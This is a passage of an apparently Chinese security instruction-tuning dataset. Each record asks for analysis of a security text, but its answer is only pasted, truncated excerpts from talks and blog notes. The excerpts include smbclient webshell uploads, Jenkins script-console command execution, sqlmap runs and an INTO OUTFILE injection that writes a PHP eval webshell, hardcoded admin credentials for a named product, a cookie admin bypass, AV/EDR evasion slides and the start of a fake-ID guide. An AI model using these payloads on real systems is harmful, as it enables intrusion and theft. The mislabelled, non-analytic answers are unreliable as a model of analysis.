七不得将未公开的网络产品安全漏洞信息向网络产品提供者之外的境外组织或者个人提供 八法律法规的其他相关规定 第十条 任何组织或者个人设立的网络产品安全漏洞收集平台应当向工业和信息化部备案工业和信息 化部及时向公安部国家互联网信息办公室通报相关漏洞收集平台并对通过备案的漏洞收集平台予以 公布 鼓励发现网络产品安全漏洞的组织或者个人向工业和信息化部网络安全威胁和漏洞信息共享平台国家 网络与信息安全信息通报中心漏洞平台国家计算机网络应急技术处理协调中心漏洞平台中国信息安 全测评中心漏洞库报送网络产品安全漏洞信息 第十一条 从事网络产品安全漏洞发现收集的组织应当加强内部管理采取措施防范网络产品安全漏洞 信息泄露和违规发布 第十二条 网络产品提供者未按本规定采取网络产品安全漏洞补救或者报告措施的由工业和信息化部 公安部依据各自职责依法处理构成中华人民共和国网络安全法第六十条规定情形的依照该规定 予以处罚 第十三条 网络运营者未按本规定采取网络产品安全漏洞修补或者防范措施的由有关主管部门依法处 理构成中华人民共和国网络安全法第五十九条规", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n协议版本 使用该协议的Windows 版本 SMB1.0 Windows 2000Windows XPWindows Server 2003 和Windows Server 2003 R2 SMB2.0 Windows Vista 和Windows Server 2008 SMB2.1 Windows 7 和Windows Server 2008 R2 SMB3.0 Windows 8 和Windows Server 2012 SMB.3.02 Windows 8.1 和Windows Server 2012 R2 SMB 3.1.1 Windows 10 和Windows Server 2016 T1051: Shared Webroot 笔者查看 Mitre ATT&CK T1051时发现该技术已被弃用即该项技术已过时没有在野使用的 案例 问了下@九世靶机中这种情况很多所以还是记录下 简单概括为使用smbclient 上传webshell 番外篇SMB 既然接触的SMB笔者就找了SMB相关的资料看了下这个服务太常见了以至于内网很多脆弱点都是 靠它打开的 SMBServer Message Block作为一种应用层协议历史比我们想象的更久远我猜看到这篇笔记的 人都没SMB的年龄大Barry Feigenbaum最初于1983年初在IBM设计SMB ,是一种文件共享协议此 为SMB1 1996年Microsoft 在 Windows NT 4.0 实现了 SMB1 即为CIFS 注意大多数时候更愿意叫做 SMB 简要的列举下Windows 的SMB 版本 在各种SMB资料中你会频繁的看到一个协议NetBIOS 协议 smbclient -L //192.168.3.71 -U 0day/jerry%Admin12345 #列出共享 smbclient //192.168.3.71/wwwroot -U 0day/jerry smb: \\> put /usr/share/webshells/aspx/cmdasp.aspx c.aspx #交互式的shell上传文件 smbclient {{//server/share}} --directory {{path/to/directory}} --command \"put {{file.txt}}\" smbclient //192.168.3.71/wwwroot -U guest%\"\" --command=\"put /home/kali/webshell.aspx webshell.aspx\" #密码为空如要目标文件夹Everyone 用户具有读 写权限 #访问 http://192.157.3.71/webshell.aspx 即可 我这里说的NetBIOS 协议 指的是Windows 下的 NetBIOS over TCP(简称NBT)协议,实际上 NetBIOS 是一种局域网中的API ,没有定义协议TCP/IP 上的NetBIOS 通过TCP/IP协议提供了 NetBIOS API 简要的说下重点 基于TCP 的NetBIOS 使用用以下端口 可在 本地连接属性TCP/IPv4属性高级WINS禁用TCP/IP 上的NetBIOS 关闭 NetBIOS 协议在Windows 上的实现为 NetBios Name Service NBNS显示名称为 TCP/IP NetBIOS Helper ,服务名称为 lmhosts 和Hosts 文件类似存在LMhosts 文件在Windows 中路径 是 %Systemroot%\\System32\\Drivers\\Etc\\lmhosts.sam Linux中在samba configs目录中 一般是 /etc/samba 或 /usr/local/samba/lib WINS(Windows Internet Name Service)可以将NetBIOS 名称解析为对应的IP地址和DNS有些 区别为了解决NetBIOS 名不可路由而出现 又说了一堆废话,大家理解其中的关键就好 SMB 枚举 参考 A Little Guide to SMB Enumeration 使用的一些工具 Nmblookup nbtscan SMBMap Smbclient Rpcclient Nmap Enum4linux Crackmapexec Nmblookup nbname 137/UDP nbname 137/TCP nbdatagram 138/UDP nbsession 139/TCP nmblookup -A 192.168.3.142 Suffix Service/Description 00 Workstation Service (wo", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nVoIP Wars : Return of the SIP Fatih Özavcı Information Security Researcher & Consultant fatih.ozavci at viproy.com viproy.com/fozavci 2 # whois  Information Security Consultant @ Viproy / Turkey  10+ Years Experience in Penetration Testing  800+ Penetration Tests, 40+ Focused on NGN/VoIP  SIP/NGN/VoIP Systems Penetration Testing  Mobile Application Penetration Testing  IPTV Penetration Testing  Regular Stuff (Network Inf., Web, SOAP, Exploitation...)  Author of Viproy VoIP Penetration Testing Kit  Author of Hacking Trust Relationships Between SIP Gateways  Blackhat Arsenal USA 2013  Viproy VoIP Pen-Test Kit  So, that's me 3 # traceroute  VoIP Networks are Insecure, but Why?  Basic Attacks but in Easy Way  Discovery, Footprinting, Brute Force  Initiating a Call, Spoofing, CDR and Billing Bypass  SIP Proxy Bounce Attack  Fake Services and MITM  Fuzzing Servers and Clients, Collecting Credentials  (Distributed) Denial of Service  Attacking SIP Soft Switches and SIP Clients, SIP Amplication Attack  Hacking Trust Relationships of SIP Gateways  Attacking SIP Clients via SIP Trust Relationships  Fuzzing in Advance  Out of Scope  RTP Services and Network Tests, Management  Additional Services  XML/JSON Based Soap Services 4 # info  SIP  Session Initiation Protocol  Only Signaling, not for Call Transporting  Extended with Session Discovery Protocol  NGN  Next Generation Network  Forget TDM and PSTN  SIP, H.248 / Megaco, RTP, MSAN/MGW  Smart Customer Modems & Phones  Easy Management  Security is NOT a Concern?!  Next Generation! Because We Said So! 5 # Administrators Think... Root Doesn't!  Their VoIP Network Isolated  Open Physical Access, Weak VPN or MPLS  Abusing VoIP Requires Knowledge  It's Easy with Automated Tools, But That's the Case !  Most Attacks are Network Based or Toll Fraud  DOS, DDOS, Attacking Mobile Clients, Spying  Phishing, Surveliance, Abusing VAS Services  VoIP Devices are Well-Configured  Weak Passwords, Old Software, Vulnerable Protocols 6 # SIP Servic", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nCunning with CNG: Soliciting Secrets from Schannel DefCon 24 Why you might care  Extracting TLS / SSL Keys (of various types) from memory  Ability to decrypt TLS connections that use ephemeral key exchanges  For anything that uses Schannel: RDP, IE, Powershell, etc...pretty much anything .NET too  Past connections AND Future since the point of the cache is resumption  Undocumented / partially documented structures elucidated  TLS session caches mapped to the requesting processes, with SNIs  A tool that does these things via Volatility/Rekall  A paper that documents these things i.e. what you get today How we get there 1. Briefest of TLS Refreshers 2. How Schannel Works 3. The Secrets : } 4. The Other Forensic Artifacts! 5. A live demo >.> < the Agenda A Disclaimer  This is NOT an exploit  Its the spec! :D  Microsoft has done nothing wrong  To the contrary, their documentation was actually pretty great  Windows doesnt track sessions for processes that load their own TLS libs  Im looking at you Firefox and Chrome  Windows doesnt track sessions for process that dont use TLS  Thatd be you teamviewer...  This talk has nothing to do with Chanel  Sorry Aine. The now infamous TLS Handshake The now infamous TLS Handshake or, Session Resumption DR; Perfect Forward Secrecy What we want to do  One time use keys, no sending secrets! What TLS actually does  Caches values to enable session resumption  recommends `An upper limit of 24 hours is suggested for session ID lifetimes`  When using the session ticket extension, sending the encrypted state over the network  basically returning to the issue with RSA, but using a more ephemeral key... What implementations also do  Store symmetric key schedules (so you can find the otherwise random keys...)  Cache ephemeral keys and reuse for a while... < and what it means to TLS See these papers: https://technet.microsoft.com/en-us/library/dn786429.aspx Whats an Schannel?  Its TLS -> the Secure Channel for Windows!  A library that gets loaded", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nImpostor Polluting Tor Metadata Mike Larsen Charlie Vedaa tl;dr example Snort rule- alert tcp $HOME_NET any -> $EXTERNAL_NET 9030:9031 (msg:\"POLICY-OTHER TOR traffic anonymizer server request\"; flow:established,to_server; content:\"GET /tor/server\"; fast_pattern:only; classtype:policy-violation; sid:9324; rev:5;) code can be found here- https://impostor.io about us the issue https://www.torproject.org/download/download.html#warning f. Use bridges and/or find company Tor tries to prevent attackers from learning what destination websites you connect to. However, by default, it does not prevent somebody watching your Internet traffic from learning that you're using Tor. If this matters to you, you can reduce this risk by configuring Tor to use a Tor bridge relay rather than connecting directly to the public Tor network. Ultimately the best protection is a social approach: the more Tor users there are near you and the more diverse their interests, the less dangerous it will be that you are one of them. Convince other people to use Tor, too! the impact  AFFIDAVIT OF SPECIAL AGENT THOMAS M. DALTON 835 1682 (Harvard bomb threat case)  December 16 2013 ~08:30  Harvard officials receive bomb threat via email  Specifically, Harvard received the e-mail messages from a service called Guerrilla Mail, an Internet application that creates temporary and anonymous e-mail addresses available free of charge. Further investigation yielded information that the person who sent the e-mail messages accessed Guerrilla Mail by using a product called TOR [sic]  Harvard University was able to determine that, in the several hours leading up to the receipt of the e-mail messages described above, [kid] accessed TOR using Harvards wireless network. is Tor safe? @runasand other considerations  implementations  Onion Browser https://cure53.de/pentest-report_onion-browser.pdf (@0x6D6172696F, @7a_, @insertScript)  endpoints  CVE-2013-1690 https://community.rapid7.com/community/metasploi t/blog/2013/08/", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nDigital Active Digital Active Self Defense Self Defense DEFCON 12 DEFCON 12 OUDOT Laurent OUDOT Laurent oudot oudot@ @rstack rstack.org .org http://www. http://www.rstack rstack.org/ .org/oudot oudot// Some references  Active Defense research project, Dittrich  http://staff.washington.edu/dittrich/ad/  Defending your right to defend: Considerations of an automated strike-back technology  Timothy M. Mullen  Launch on Warning: Aggressive Defense of Computer Systems  Curtis E.A. Karnow  Enforcer, Automated Worm Mitigation for private networks  BlackHat Seattle, February 2003, Timothy M.Mullen, AnchorIS.com  Vigilantes on the net  Barbara Moran, NewScientist, 12 june 2004  Symbiot, Adaptive Platform for Network Security  http://www.symbiot.com Summary  Introduction  Digital threats,  Hardening / reaction  Prevention / Countermeasure  Active Defense?  Legal Issues  Technical considerations  Fighting back  Requirements  Honeypots  Handling Internal threats  Examples  Technical limitations  Conclusions Introduction  Current threats  Known limitations for defense technologies  Many solutions in the information security field  Laws fail for certain kind of activities  Natural temptation  Fighting back attackers, counterstrike  Not so many solutions that use active countermeasure capabilities  Interesting field of research and development ? The digital threats  Though we use more and more security technologies, there are still security problems  Confidentiality, Integrity, Availability, Copyright, etc  Information Assurance  External threats  Firewall, Proxies, Hardened services  Ethical Hackers, Corporate spies, Cyber terrorists...  Internal threats : easier/faster access  Authentication, In-depth Protection...  Trainees, Outsourcing, Employees From hardening to reaction  A lot of technologies might be used to block evil traffic  Routers, Firewalls, proxies, etc  Allow the minimum that is needed  But aggressors still find solutions like :  Bouncing in (bad security rules, bu", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n知道创宇漏洞社区计划 知道创宇 张祖优(Fooying) S Z 漏洞社区 KCon 追求干货有趣的 黑客大会 Sebug 聚焦漏洞提供漏洞威 胁情报信息与交易平台 ZoomEye 网络空间搜索 引擎全球漏 洞感知与预警 K 过去 在过去基于 ZoomEye 我们做了许多事 组件识别 通过自主研发引擎我 们对网络空间进行了重 要端口探测与组件识别 开放搜索 我们公开了许多研究成 果并开放海量结果数 据提供大家搜索 全球路由器后门探测 2014年2月份我们针对 全球路由器进行全网扫描 并发出安全预警 摄像头漏洞探测 2014年3月针对国外黑帽 大会曝光的家庭摄像头漏洞 进行全网的探测并发出预警 心脏出血 2014年4月针对心脏出 血漏洞进行全球探测并绘 制全球范围分布2015年 4月进行一周年普查 破壳漏洞 2014年9月份应急响应破 壳漏洞第一时间将国内受 影响情况统计并预警 这是大家所能看到的 上线专题 工控专题漏洞专题等 Dork 闭环 Dork 是我们和网络空间交 流的语言你的每一次搜 索都将诞生一个 Dork 背后的这些 扫描能力提升约4倍 端口覆盖提升 1 倍 识别组件增加 30 % 扫描速率提升约 3 倍 数据存储量增加 4 倍以上 还有更多 组件指纹识别 引擎 Wmap/Xmap 调度框架 Lucifer 高性能存储 Hadoop/ES 数据深度 挖掘 可视化 组件 架构 Sebug 7月7日开始内测 今日起正式公测 漏洞集市 100 万补贴欢 迎大家到我们平 台进行提交漏洞 PoC兑换查看 等 漏洞集市 漏洞基本字段补充 详情补充 PoC/Exp 提交 详情与 PoC 兑换 兑换分成 交易动态 更多 ZoomEye 功能与奖励 ZoomEye 暗物质消除计划 ZoomEye X计划 Dork 提交奖励计划等 漏洞集市 100 万补贴欢 迎大家到我们平 台进行提交漏洞 PoC兑换查看 等 ZoomEye 更多功能与计划 ZoomEye 暗物质消 除计划 ZoomEye X 计划 Dork 提交 奖励计划 Pocsuite 开放我们的 PoC 标准开 源我们的框架 更多 ZoomEye 功能与奖励 ZoomEye 暗物质消除计划 ZoomEye X计划 Dork 提交奖励计划等 漏洞集市 100 万补贴欢 迎大家到我们平 台进行提交漏洞 PoC兑换查看 等 Pocsuite 远程 PoC 框架知道创宇安全研究团队发展的基石 基础 PoC 编写 SDK 自动化调用与测试 1 6 Pocsuite 视频 ZoomEye X ./zoomeye dork 'app:openssl' | ./sebugvul 'openssl' Pocsuite 开放我们的 PoC 标准开 源我们的框架 更多 ZoomEye 功能与奖励 ZoomEye 暗物质消除计划 ZoomEye X计划 Dork 提交奖励计划等 漏洞集市 100 万补贴欢 迎大家到我们平 台进行提交漏洞 PoC兑换查看 等 ZoomEye X 目标 Pocsuite PoC 根据 ZoomEye Dork 获取对应目标 获取对应漏洞 PoC Pocsuite hacker@kcon:~# ./zoomeye  dork 'app:openssl' | ./sebug vul 'openssl 1 9 ZoomEye X 视频 我们将开放更多的能力 核心伙伴生态圈 构建核心伙伴生态圈优 先开放我们的能力 期待你的加入 Fooying 谢谢大家", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nModule 2 Typical goals of malware and their implementations https://github.com/hasherezade/malware_training_vol1 Persistence Basics of Persistence  WHO?  Most of the malware needs it (except some ransomware)  WHY? To start the application after each reboot  HOW? Using legitimate persistence methods Using custom, creative methods.... Basics of Persistence Windows offers various legitimate persistence ways  lets recall them... Basics of Persistence  Registry keys, i.e.:  HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run  HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce  HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run  The most commonly used technique (also by malware)... https://support.microsoft.com/pl-pl/help/179365/info-run,-runonce,-runservices,-runservicesonce-and-startup Basics of Persistence: Startup link  %APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup Basics of Persistence: Scheduled task  Task scheduler view Task scheduler view: Basics of Persistence: System Services UAC Bypass required Basics of Persistence: System Services  Administrator rights required  Creating a service: UAC Bypass required sc create <service_name> binPath= <service_path> DisplayName= <service_display_name> start= auto Basics of Persistence: System Services  Related registry keys:  HKLM\\SYSTEM\\ControlSet001\\services\\<service name>  HKLM\\SYSTEM\\ControlSet002\\services\\<service name>  HKLM\\SYSTEM\\CurrentControlSet\\services\\<service name> UAC Bypass required Basics of Persistence: System Services  Regedit view: UAC Bypass required Hunting for malware persistence artifacts SysIntenals Autoruns https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns RegShot  RegShot allows for monitoring changes in the Windows Registry https://sourceforge.net/projects/regshot Hiding Persistence Hiding Persistence - ideas  Typical methods, but with extra measures to cover/protect  Abuse of other mechanisms of the system for automated injection, i.e.:  AppInit_DLL, C", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nT H E C O M P L E T E A M A T E U R 1 ID Making Operating Guide by Doug Farre For Informational Purposes Only : An introduction and word of caution I want to start off by saying that none of the information outlined in this guide should be used in the process of manufacturing fraudulent identification cards. Although real government issued documents may be used as examples, they should only be used as examples to what you may model your identification cards like. The use the of the information in this document for the purpose of producing fake or fraudulent IDs would be criminal and I strongly advise against it. Lets start off by describing the Texas fake ID laws, in an attempt to dissuade you further. The following was quoted from http://www.smu.edu/healthcenter/ alcoholeducation/adp_fakeid.asp P O S S E S S I O N O F F A K E IDENTIFICATION Section 521.453, Transportation Code Under 21 Years of Age: Class C Misdemeanor (Up to $500 Fine) A person under the age of 21 years commits an offense if the person possesses, with the intent to represent that the person is 21 years of age or older, a document that is deceptively similar to a driver's license or personal identification certificate unless the document displays the statement \"NOT A GOVERNMENT DOCUMENT\" diagonally...on both the front and back of the document in solid red capital letters at least 1/4 inch in height. The document is deceptively similar if a reasonable person would assume the document was issued by DPS, another agency of this state, another state, or the United States. Section 521.456 Transportation Code: Class C Misdemeanor (Up to $500 Fine): A person commits an offense if the person possesses with the intent to use, circulate or passes a forged or counterfeit instrument that is not made by the appropriate authority (DPS, another agency of this state, another state, or the United Stated). DELIVERY OR MANUFACTURE O F C O U N T E R F E I T IDENTIFICATION SECTION 521.456 Transportation Code: Class A Misd", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nfunction hooking for osx and linux joe damato @joedamato timetobleed.com slides are on timetobleed.com (free jmpesp) im not a security researcher. call me a script kiddie: @joedamato laughinglarry.com slayerinc.com dbgrady.files.wordpress.com assembly is in att syntax WTF is an ABI ? WTF is an Application Binary Interface ? alignment thomasgroup.com calling convention arianlim.wordpress.com object file and library formats tandemfs.org hierarchy of specs topatoco.com System V ABI (271 pages) System V ABI AMD64 Architecture Processor Supplement (128 pages) System V ABI Intel386 Architecture Processor Supplement (377 pages) MIPS, ARM, PPC, and IA-64 too! mac osx x86-64 calling convention based on System V ABI AMD64 Architecture ! ! ! Processor Supplement gregs-wines.com alignment thomasgroup.com end of argument area must be aligned on a 16byte boundary. and $0xfffffffffffffff0, %rsp calling convention arianlim.wordpress.com  function arguments from left to right live in: %rdi, %rsi, %rdx, %rcx, %r8, %r9  thats for INTEGER class items.  Other stuff gets passed on the stack (like on i386).  registers are either caller or callee saved object file and library formats tandemfs.org steverubel.typepad.com ELF Objects en.wikipedia.org ELF Objects  ELF objects have headers  elf header (describes the elf object)  program headers (describes segments)  section headers (describes sections)  libelf is useful for wandering the elf object extracting information.  the executable and each .so has its own set of data ELF Object sections  .text - code lives here  .plt - stub code that helps to resolve absolute function addresses.  .got.plt - absolute function addresses; used by .plt entries.  .debug_info - debugging information  .gnu_debuglink - checksum and filename for debug info ELF Object sections  .dynsym - maps exported symbol names to offsets  .dynstr - stores exported symbol name strings  .symtab - maps symbol names to offsets  .strtab - symbol name strings  more sections for other st", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nCTF Beginner, How to Start from 0 skybullet 從這場演講會聽到什麼  關於我們  什麼是 CTF  CTF 題型介紹  給 CTF 初學者的建議 關於我們 chalz - 北科資工 - web developer 我們是誰 ku - 清大物理 - 大阪大學 - IoT 韌體工程師 skybullet - HITCON 2015 - 桌遊店 - 2015 年 10 月  比賽經驗 D-CTF Qualification 2015 ( rank 198 / 993 ) HITCON 2015 ( rank 63 / 969 ) 9447 Security Society CTF 2015 ( rank 216 / 1148 ) 什麼是 CTF  wikipedia Capture the Flag (CTF) is a computer security competition. CTF contests are usually designed to serve as an educational exercise to give participants experience in securing a machine, as well as conducting and reacting to the sort of attacks found in the real world. 常見的 CTF 題目類型 - web - crypto - exploit - reverse - misc web 介紹  給你一個網站然後你要 1. 取得 管理者 admin 權限 2. 題目說明  瞭解網站功能的同時去思考可以進行嘗試攻擊 的切入點找到有問題的點很重要  Web 的題目通常是由很多方法去組合 Nick's been eating your grandmother's strombomi. Head over to http://nicklesndimes-wq3mhu8l. 9447.plumbing. Gain access to his admin account. 9447 CTF nicklesndimes (200pts) nicklesndimes 解題方式 辦一個帳號  忘記密碼  收信 http://nicklesndimes-wq3mhu8l.9447.plumbing/ reset_password?action=choose_password &auth_key=06ce8054b60acc44eea7937aca0ebdf3 &id=441 auth_key : 看起來像 md5 id : 註冊者的 ID 觀察參數 嘗試看看 md5(\"lalalala123\")L =L06ce8054b60acc44eea7937aca0ebdf3 http://nicklesndimes-wq3mhu8l.9447.plumbing/ reset_password?action=choose_password &auth_key=06ce8054b60acc44eea7937aca0ebdf3 &id=441 重置 admin 密碼 md5(\"admin\")L =L21232f297a57a5a743894a0e4a801fc3 http://nicklesndimes-wq3mhu8l.9447.plumbing/ reset_password?action=choose_password &auth_key=21232f297a57a5a743894a0e4a801fc3 &id=1 登入還需要 email 藏在 Users 標題旁的 json 裡面 嘗試登入 登入失敗IP被擋了 如果他是用 $_SERVER['HTTP_X_FORWARDED_FOR'] HTTP_X_FORWARDED_FOR ping Server PINGLnicklesndimes-wq3mhu8l.9447.plumbingL(104.28.13.28)L 56LbytesLofLdata.L 64LbytesLfromL104.28.13.28:Licmp_seq=1Lttl=128Ltime=10.7Lms 將 X-Forwarded-For 設成跟 Server IP一樣 再登入一次 Capture The Flag crypto 介紹  加密法 - 對稱加密classical, DES, 3-DES, AES - 非對稱加密RSA, Diffie-Hellman, elliptic curve  簡單的講就給你一串字串想辦法知道其中含意  解題步驟 - 找出題目的加密演算法 - 破解 c", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# Jenkins未授权访问漏洞 ## 漏洞描述 部署**Jenkins 1.62版本**将全局授权策略打开目前新版本的Jenkins已默认需要用户登录但老版的中默认配置是\"任意用户可以做任何事\"存在未授权访问的问题 ## 环境搭建 选择1.62版本进行下载http://archives.jenkins-ci.org/war-stable/1.625.1/jenkins.war 将WAR包丢到tomcat的webapps里面启动tomcat ![image-20220519140115351](../../.gitbook/assets/image-20220519140115351.png) ![image-20220519140127852](../../.gitbook/assets/image-20220519140127852.png) ## 漏洞复现 进入管理页面http://192.168.32.131:8080/jenkins/manage ![image-20220519140202018](../../.gitbook/assets/image-20220519140202018.png) 进入脚本命令行后缀输入script进入脚本命令行输入`println \"ls\".execute().text`就可以执行`ls`命令 ![image-20230129211427939](../../.gitbook/assets/image-20230129211427939.png)", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n.\\\" auto-generated by docbook2man-spec $Revision: 1.1 $ .TH \"DROP USER\" \"7\" \"2003-11-02\" \"SQL - Language Statements\" \"SQL Commands\" .SH NAME DROP USER \\- 删除一个数据库用户帐号 .SH SYNOPSIS .sp .nf DROP USER \\fIname\\fR .sp .fi .SH \"DESCRIPTION 描述\" .PP \\fBDROP USER\\fR 从数据库中删除指定的用户 它不删除数据库里此用户所有的表视图或其他对象 如果该用户拥有任何数据库你会收到一个错误信息 .SH \"PARAMETERS 参数\" .TP \\fB\\fIname\\fB\\fR 一个现存用户的名称 .SH \"NOTES 注意\" .PP PostgreSQL 还有一个程序 dropuser [\\fBdropuser\\fR(1)]  这个程序和这条命令功能相同实际上程序里调用此命令 但是可以在命令行上运行 .PP To drop a user who owns a database, first drop the database or change its ownership. .SH \"EXAMPLES 例子\" .PP 删除一个用户帐户 .sp .nf DROP USER jonathan; .sp .fi .SH \"COMPATIBILITY 兼容性\" .PP \\fBDROP USER\\fR 语句是一个 PostgreSQL 的扩展SQL 标准把用户的定义交给具体实现处理 .SH \"SEE ALSO 参见\" ALTER USER [\\fBalter_user\\fR(7)], CREATE USER [\\fBcreate_user\\fR(l)] .SH \"译者\" .B Postgresql 中文网站 .B 何伟平 <laser@pgsqldb.org>", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nInceptor Bypass AV/EDR solutions combining well known techniques 1 Copyright  2021 Alessandro Magnosi. All rights reserved Version 1.0 Alessandro Magnosi (@klezVirus) Copyright  2021 Alessandro Magnosi. All rights reserved WhoAmI Senior Security Noob  Red Teamer, Code Reviewer What I do the most:  Mostly.. I spend my time fixing things my kid breaks  Beatboxing(-ish!?) till my wife wants to kill me  Drink coffee while coding 2 GitHub: @klezVirus Twitter: @klezVirus Ok, what well see? AV Essentials AV Features Defender Bypass Techniques EDR Essentials Win32 API Overview EDR Features Bypass Techniques Inceptor: a framework to bypass them all (hopefully)! 3  First, solve the problem. Then, write the code.  John Johnson 4 5 AV Essentials AV Components 6 DECOMPRESSORS Decompressors are responsible of decompressing archives to allow the scanner to analyse them SCANNERS The scanner is responsible of analysing files stored in the file system. There are also on- access scanners, or real-time scanners (AMSI) UNPACKERS Unpackers need to automatically detect and unpack code packed with known packers and allow the scanner to analyse them SANDBOX The sandbox is responsible of emulating the program in a virtualised environment, to detect suspicious activities (behavioural) Static Scanner  Static Analysis  Blacklist approach  Signature based on particular code or data  AV holds a database of signatures  Usually combined with heuristic and dynamic analysis. Sandbox  Runtime analysis performed in a Virtual environment  The analysis is subjected to certain limits: o Time o Virtualized APIs o Sandbox capabilities Real-Time Scanner (AMSI)  In-memory static analysis  Scan performed injecting `amsi.dll` within a process address space  Scan run against WSH, PowerShell, .NET 4.8+, UAC, JavaScript, VBScript and Office VBA 7 AV Components What we need to bypass and when? 8 What we need to bypass and when? 9 Native Executable .NET Executable PowerShell Script Static Scanner (Signatures) Real-T", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n账户名 密码 RASCOM 1A2b3C4d56. RAS_admin R1a2b3c4d56. 应急时碰到的一套系统简单记录下 0x01 硬编码问题 科迈RAS4.0在安装时会创建2个管理员账户 RAS_admin  RASCOM 这两个账户硬编码了2组密码 这就导致如果机器开了RDP那么可以通过这两组帐密直接登录 0x02 SQL注入问题 审计的时候发现这套源码通过COM组件形式调用的SQL语句IDA里看到均为直接拼接没有做过滤 Server/CmxCheckBind.php python3 sqlmap.py -u \"http://10.100.100.133:8088/Server/CmxCheckBind.php? a=1&b=2&c=3&d=4&from=5\" --level 5 --risk 3 Server/CmxBindMachine.php python3 sqlmap.py -u \"http://10.100.100.133:8088/Server/CmxBindMachine.php? m=1&b=2&a=3&c=4\" --risk 3 --level 5 Server/CmxUserMap_1.php python3 sqlmap.py -u \"http://10.100.100.133:8088/Server/CmxUserMap_1.php? a=a&b=b&c=c\" Server/CmxGetLoginType.php http://10.100.100.133:8088/Server/CmxGetLoginType.php? a=admin%27%20LIMIT%200%2C1%20INTO%20OUTFILE%20%27C%3A%2FProgram%20Files%20%28x86%2 9%2FComexe%2FRasMini%2Frasweb%2FApache2%2Fhtdocs%2Fsmarty- 2.6.19%2FServer%2Faa.php%27%20LINES%20TERMINATED%20BY/**/0x3C3F70687020406576616C2 8245F504F53545B2758275D293B3F3E--%20- 类似的地方还有很多几乎与数据交互的地方均可注入 0x03 越权 Cookie 中添加 RAS_Admin_UserInfo_UserName=admin 即可以 admin 登录 0x04 影响范围", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n2022/4/29 02:46 Evernote Export file:///C:/Users/jiushi/Desktop/JavaWeb 内存马技术归纳.html 1/12 环境:适用于tomcat ------------------------------------------------------- 前言: 对于各类Java 容器的内存马主要是需要获取context 为什么context 对象这么重要呢 对于能达成的目的context拥有当前中间件或框架处理请求保存和控制servlet对象保存和控制filter对象等功能的对象 --------------------------------------------------------- 前置知识: getField 获取一个类的 ==public成员变量包括基类==  getDeclaredField 获取一个类的 ==所有成员变量不包括基类==  Field.setAccessible 成员变量为private必须进行此操作 tomcat Context官方文档:https://tomcat.apache.org/tomcat-8.0-doc/api/org/apache/catalina/Context.html 获取context部分 ServletContext servletContext = request.getSession().getServletContext(); //获取ServletContext对象 Field appctx = servletContext.getClass().getDeclaredField(\"context\"); //获取context成员变量 appctx.setAccessible(true); //值为 true 则指示反射的对象在使用时应该取消 Java 语言访问检查 ApplicationContext applicationContext = (ApplicationContext) appctx.get(servletContext); //获取servletContext元素 Field stdctx = applicationContext.getClass().getDeclaredField(\"context\");//获取context成员变量 stdctx.setAccessible(true); //值为 true 则指示反射的对象在使用时应该取消 Java 语言访问检查 StandardContext standardContext = (StandardContext) stdctx.get(applicationContext); //获取applicationContext元素 ServletContext servletContext = request.getSession().getServletContext(); //返回当前会话上下文并获取Servlet上下文 Field appctx = servletContext.getClass().getDeclaredField(\"context\"); //获取类的声明字段 appctx.setAccessible(true); ApplicationContext applicationContext = (ApplicationContext) appctx.get(servletContext); Field stdctx = applicationContext.getClass().getDeclaredField(\"context\"); stdctx.setAccessible(true); StandardContext standardContext = (StandardContext) stdctx.get(applicationContext); Field Configs = standardContext.getClass().getDeclaredField(\"filterConfigs\"); Configs.setAccessible(true); Map filterConfigs = (Map) Configs.get(standardContext); -------------------------------------------------------- context介绍: Context元素代表一个web应用运行在某个特定的虚拟主机上 如Servlet Specification 2.2或以后版本中描述的那样每个web应用基于一个Web Application Ar", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nIT Audit: Security Beyond the Checklist This paper is from the SANS IT Audit site. Reposting is not permited without express written permission. Copyright SANS Institute Author Retains Full Rights Interested in learning more? Check out the list of upcoming events offering \"IT Security Audit and Control Essentials (Audit 410)\" at http://it-audit.sans.orghttp://it-audit.sans.org/events/  SANS Institute 2004, Author retains full rights. Key fingerprint = AF19 FA27 2F94 998D FDB5 DE3D F8B5 06E4 A169 4E46  SANS Institute 2004, As part of GIAC practical repository. Author retains full rights. Audit of a Small LAMP (Linux, Apache, MySQL, and PHP) Web Application SANS GIAC Systems and Network Auditor (GSNA) practical Version 3.1  Option One Herschel Gelman May 2, 2004  SANS Institute 2004, Author retains full rights. Key fingerprint = AF19 FA27 2F94 998D FDB5 